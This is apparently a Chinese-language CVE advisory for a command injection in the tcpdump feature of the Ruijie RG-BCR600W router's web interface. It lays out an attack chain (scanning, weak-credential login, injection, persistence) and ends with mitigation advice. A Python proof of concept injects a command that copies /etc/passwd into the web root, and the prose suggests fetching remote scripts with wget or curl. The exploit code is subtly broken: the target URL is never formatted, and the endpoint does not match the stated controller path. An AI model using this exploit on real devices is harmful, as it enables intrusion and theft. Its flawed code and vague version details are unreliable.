CVE-2025-56087 Ruijie RG-BCR600W 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56087

漏洞类型

OS命令注入/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-BCR RG-BCR600W

漏洞概述

CVE-2025-56087是锐捷网络技术有限公司（Ruijie Networks）生产的RG-BCR600W路由器中存在的一个高危操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/usr/lib/lua/luci/controller/admin/common_tcpdump.lua文件中的run_tcpdump功能点。攻击者可以通过构造恶意的POST请求，在未经充分安全验证的情况下将任意操作系统命令注入到底层系统并执行。由于该设备通常部署在企业网络边缘位置，成功的漏洞利用将允许攻击者完全控制受影响设备，进而可能横向移动到内部网络、窃取敏感数据或部署恶意软件。由于该漏洞的CVSS评分达到8.8分，且攻击复杂度较低无需特殊条件即可实施，因此被评定为高危漏洞，建议相关用户尽快采取防护措施。

技术细节

该漏洞的根本原因在于应用程序对用户输入的验证不足。在Ruijie RG-BCR600W的Web管理接口中，common_tcpdump.lua控制器处理run_tcpdump请求时，直接将HTTP POST请求中的参数传递给底层系统命令执行函数而未进行适当的输入过滤和参数校验。攻击者可以在POST请求的参数中嵌入Shell元字符和命令分隔符（如分号、管道符、反引号等），使注入的命令被系统shell解释执行。具体而言，攻击者可能利用tcpdump功能的目标参数或接口参数注入如wget或curl等命令，从远程服务器下载并执行恶意脚本。由于该管理接口通常仅需低权限认证即可访问（PR:L），且无需用户交互（UI:N），使得漏洞的利用门槛极低，攻击者可以在短时间内完成从侦察到完全控制的过程。

攻击链分析

STEP 1

步骤1: 侦察与发现

攻击者识别目标Ruijie RG-BCR600W设备，通常通过扫描公网IP段或利用Shodan/Censys等搜索引擎发现暴露的管理接口

STEP 2

步骤2: 认证获取

攻击者使用低权限凭据登录设备管理界面（默认凭据或猜测的弱密码），获取有效的会话cookie

STEP 3

步骤3: 构造恶意请求

攻击者构造包含命令注入payload的POST请求，目标指向/usr/lib/lua/luci/controller/admin/common_tcpdump.lua中的run_tcpdump端点

STEP 4

步骤4: 命令注入执行

由于输入验证不足，payload中的Shell命令（如分号后的任意命令）被系统shell解析执行

STEP 5

步骤5: 持久化与横向移动

攻击者可在设备上建立后门、提取敏感配置信息，并以此为跳板向内网其他系统发起进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-56087 PoC - Ruijie RG-BCR600W OS Command Injection
# Target: /usr/lib/lua/luci/controller/admin/common_tcpdump.lua

import requests
import sys

TARGET = "http://{target_ip}"
LOGIN_URL = f"{TARGET}/cgi/login"
TCPDUMP_URL = f"{TARGET}/cgi/run_tcpdump"

def login(session, username, password):
    """Authenticate to the device"""
    data = {"username": username, "password": password}
    resp = session.post(LOGIN_URL, data=data, timeout=10)
    return resp.cookies

def exploit(session, cookies, target_ip):
    """Execute command injection via run_tcpdump endpoint"""
    # Inject command to exfiltrate /etc/passwd
    payload = "; cat /etc/passwd > /www/exfil.txt"
    data = {
        "interface": payload,
        "expression": "tcp",
        "count": "1"
    }
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    resp = session.post(TCPDUMP_URL, data=data, cookies=cookies, headers=headers, timeout=10)
    return resp.status_code

def main():
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    session = requests.Session()
    print(f"[*] Logging in to {target_ip}...")
    cookies = login(session, username, password)
    print("[+] Login successful")
    
    print(f"[*] Sending exploit payload...")
    status = exploit(session, cookies, target_ip)
    print(f"[*] Response status: {status}")
    print("[+] Exploit sent - check for command execution on target")

if __name__ == "__main__":
    main()

影响范围

Ruijie RG-BCR600W 固件版本 <= 未知受影响版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，将RG-BCR600W的管理接口从公网移除，仅允许通过受信任的内网或VPN连接访问；其次，禁用不必要的管理功能，限制run_tcpdump等高危功能的调用权限；最后，启用设备日志审计，监控异常的POST请求模式，以便及时发现潜在的攻击行为。